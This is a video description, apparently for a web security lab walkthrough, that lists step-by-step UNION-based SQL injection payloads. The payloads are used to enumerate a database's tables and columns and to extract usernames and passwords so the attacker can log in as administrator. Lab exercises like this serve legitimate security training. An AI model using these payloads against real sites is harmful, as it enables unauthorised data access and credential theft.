SQL injection attack, listing the database contents on non-Oracle databases

Published: 22 September 2024
on channel: Aditi Decrypts
17
2

🛠️ Use Burp Suite to intercept and modify the request setting the product category filter.

📊 Determine the number of columns returned by the query and which ones contain text data. Verify that two columns contain text using this payload:

`'+UNION+SELECT+'abc','def'--`

🔍 Retrieve the list of tables in the database with this payload:

`'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--`

🔐 Find the table with user credentials, then retrieve column details using:

`'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--`

👤 Find columns for usernames and passwords. Retrieve them using:

`'+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--`

🔑 Finally, locate the administrator's password and use it to log in!


Watch video SQL injection attack, listing the database contents on non-Oracle databases online without registration, duration hours minute second in high quality. This video was added by user Aditi Decrypts 22 September 2024, don't forget to share it with your friends and acquaintances, it has been viewed on our site 17 once and liked it 2 people.